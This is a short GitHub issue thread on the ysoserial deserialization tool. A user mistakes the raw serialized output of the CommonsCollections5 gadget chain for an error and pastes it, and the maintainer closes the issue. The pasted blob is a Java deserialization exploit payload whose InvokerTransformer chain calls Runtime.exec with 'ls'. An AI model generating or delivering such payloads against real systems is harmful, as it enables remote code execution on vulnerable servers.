### ISSUE TITLE
Error when serializing command

### ISSUE THREAD

**Issue by Smoss** [frohoff/ysoserial#156]
When I try to serialize using the command `java -jar ysoserial.jar CommonsCollections5 ls` I get the error.
`
��sr.javax.management.BadAttributeValueExpException��ګc-F@LvaltLjava/lang/Object;xrjava.lang.Exception��>�;�xrjava.lang.Throwable��5detailMessagetLjava/lang/String;[L
stackTracet[Ljava/lang/StackTraceElement;LsuppressedExceptionstLjava/util/List;xpqpur[Ljava.lang.StackTraceElement;F*<<�"9xpsrava.lang.StackTraceElementa	Ś&6݅I
lineNumberLdeclaringClassq~fileNameq~L
methodNameq~xpQt&ysoserial.payloads.CommonsCollections5tCommonsCollections5.javat	getObjectsq~
q~q~sq~                                                                                             3q~
       "tysoserial.GeneratePayloadtGeneratePayload.javatmainsr&java.util.Collections$UnmodifiableList�%1��Llistq~xr,java.util.Collections$UnmodifiableCollectionB��^�LctLjava/util/Collection;xpsrjava.util.ArrayListx����a�Isizexpwxq~�xsr4org.apache.commons.collections.keyvalue.TiedMapEntry��қ9��Lkeyq~LmaptLjava/util/Map;xptfoosr*org.apache.commons.collections.map.LazyMapn唂�y�Lfactoryt,Lorg/apaciTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;�V*��4�xpsr;org.apache.commons.collections.functors.ConstantTransformerXv�A��L	iConstantq~xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformer���k{|�8[iArgst[Ljava/lang/Object;L
                                                              iMethodNameq~[
                                                                            iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;��X�s)lxpt
getRuntimeur[Ljava.lang.Class;�׮��Z�xpt	getMethoduq~2vrjava.lang.String��8z;�Bxpvq~2sq~+uq~/puq~/tinvokeuq~2vrjava.lang.Objectxpvq~/sq~+ur[Ljava.lang.String;��V��{Gxptlstexecuq~2q~7sq~'srjava.lang.Integer⠤���8Ivaluexrjava.lang.Number���
                                                                                                        ���xpsrjava.util.HashMap���`�F
loadFactorI	thresholdxp?@xx
`
I'm using OpenJdk 8 on an Ubuntu VM.

**Comment by zxc12609** [comment]
are you kidding me?

**Comment by goonmax** [comment]
Am facing a similar issue

**Comment by frohoff** [comment]
As noted above, serialized output stream should be piped to other command(s) or a file. Closing for now.
